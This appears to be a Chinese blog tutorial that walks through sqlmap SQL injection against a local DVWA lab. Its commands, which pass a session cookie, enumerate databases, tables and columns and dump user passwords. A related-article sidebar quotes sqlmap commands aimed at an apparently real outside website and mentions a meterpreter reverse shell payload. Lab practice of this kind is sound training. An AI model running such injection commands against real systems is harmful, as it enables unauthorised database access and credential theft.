kali linux——SQLmap注入学习实战- dvwa

最新推荐文章于 2024-06-26 01:09:19 发布
最新推荐文章于 2024-06-26 01:09:19 发布
阅读量1.2w 收藏 45
点赞数 5
分类专栏: kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39855998/article/details/94622475
版权

目录

1、安装phpstudy和dvwa创建测试环境

2、选择sql注入,输入userid并提交,记录当前url和网页cookie

3、开始sqlmap爆破

1、安装phpstudy和dvwa创建测试环境

注意:

本文图片太大,鼠标点开查看比较清晰。

dvwa文件夹放入phpstudy网站根目录下面。

修改phpstudy配置文件数据库密码为root。

dvwa登陆页面admin/password。

登陆url:http://192.168.191.2/dvwa/index.php

设置安全性为低便于注入。

 

2、选择sql注入,输入userid并提交,记录当前url和网页cookie

 

 

3、开始sqlmap爆破

3.1、爆破url

sqlmap -u   http://192.168.191.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#

 

结果发现停在登陆url上面,需要加上cookie进行注入,--batch避免中间会不断需要输入y/n 

sqlmap  -u "http://192.168.191.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie "security=low; PHPSESSID=3oeln7bhi0kp4diku5pfngmia3"

 

3.2、爆破库名

sqlmap -u "http://192.168.191.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie "security=low; PHPSESSID=3oeln7bhi0kp4diku5pfngmia3" --batch –dbs

3.3、爆破表

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa  --tables

3.4、爆破列

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users --columns

3.5、爆破字段

sqlmap -u "http://192.168.191.2/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie "security=low; PHPSESSID=3oeln7bhi0kp4diku5pfngmia3" --batch -D dvwa  -T users  -C user,password –dump

密码破解成功。

 

情绪零碎碎
关注
  • 5
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3196
学习sqlmap自动注入
Kali Linux中的SQL注入攻击
CJ_fei7的博客
11-30 1811
SQL注入攻击是一种常见的网络安全漏洞,它可以让攻击者利用不当的输入验证机制来执行恶意的SQL语句,导致数据库被盗取、数据泄露、甚至系统被完全控制。在本篇博客中,我们将重点介绍Kali Linux中的SQL注入攻击,并通过实例演示如何使用Kali Linux进行SQL注入攻击。sqlmap是一款自动化的SQL注入工具,它可以帮助我们发现和利用网站中的SQL注入漏洞。总之,学习和了解Kali Linux中的SQL注入攻击是非常重要的,它可以帮助我们更好地了解和防御SQL注入攻击,从而加强网络安全。
sqlmap命令学习及测试dvwa_SQL_Injection】
最新发布
qq_58553228的博客
06-26 426
内容有常见的sqlmap的options,至于script暂未学习到。
kali Liunx 利用漏洞注入——SQL注入
Sword_of_despair的博客
11-19 474
和其他示例一样,命令注入漏洞是由于输入验证机制不佳,以及使用用户提供的数据来形成字符串,这些字符串可能将用作操作系统的命令。20.下面维续猜解后面的字符,在结果中,你可能会发现%的结果总为 trme,这是因为%是通配符,它可以和任意一个字符匹配到。如果想要获得用户名和密码,就像在前面的小节中所做的那样,需要知道具有这些信息的表的名称。我们的载荷列表是a-&,1-9,和所有特殊符号的集合。应用程序会对上传的文件进行安全检查,当然,安全检查的手段是多种多样的,常见的是对后缀名的检查和。
kali中的sqlmap的使用
yishuihanwyf的博客
12-01 868
kalisqlmap中的简单使用
sql注入
m0_62207482的博客
12-12 1012
在使用bp的intruder攻击时,通过增加线程提高攻击的频率。# python sqlmap.py -u url -D 数据库名 -T 表名 -C 字段名1,字段名2... --dump。# python sqlmap.py -u url -D 数据库名 -T 表名 --columns。# python sqlmap.py -u url -D 数据库名 --tables。// 对用户输入的数据做int类型的转换。# 5. 获取当前数据库指定的表的字段名。# 4. 获取当前数据库中所有表的名称。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 649
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-amd64.part4)
06-14
Kali Linux VirtualBox(kali-linux-2022.2-virtualbox-i386.ova)文件分割成 4个 压缩包,必须集齐4个 文件后才能一起解压一起使用: kali-linux-2022.2-virtualbox-amd64.part1 ...kali-linux-2022.2-virtualbox-amd...
Web渗透测试 使用Kali Linux
06-15
使用kali linux做web渗透的经典书籍,外文书籍中文翻译。
Kali Linux VMware(kali-linux-2022.2-vmware-i386.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-i386.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: Kali Linux VMware(kali-linux-2022.2-vmware-i386.part1.rar) ... ...
使用kali完成sql注入
pray030的博客
12-09 8941
使用kali完成sql注入 本文仅用于学术参考分享,如有侵权,请联系作者删除,请勿随意对网站进行sql注入 前期准备 1.kali虚拟机(自带sql注入所需工具) 2.能够进行注入网站 实验步骤 1.查看是否可以sql注入 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ GET 2.爆库 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ --dbs 3.查看当前使用的是哪个
kali渗透内网和外网
weixin_62693307的博客
04-17 6113
set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用。这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 763
任务环境说明:服务器场景:Server1。
Kali Linux 下搭建DVWA靶场和Sqli-labs注入环境
A
04-16 1870
DVWA/////Sqli-libs适用于练习sql注入学习之前请先了解sql语句。
kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 5890
安全等级调为low进入SQL Injection(Blind)页面。
渗透测试实验_在kali Linux 2021环境下使用sqlmapDVWA进行sql注入
weixin_47133613的博客
04-06 7900
文章目录1. sqlmap是什么2. 启动kali Linux ,进行sqlmap更新3. 启动phpStudy,启动火狐浏览器代理,运行BurpSuite4. 如果sqlmap出现404或者返回test的报错,可以尝试重置DVWA,重启phpStudy5. 选择安全等级“Low”,点击“SQL Injection”,通过报文中的url和cookie构造sqlmap命令获取信息5.1 获取数据库5.2 获取dvwa数据库中的表名5.3 获取dvwa库中users表中的列名5.4 获取dvwa库中users表
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

情绪零碎碎

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值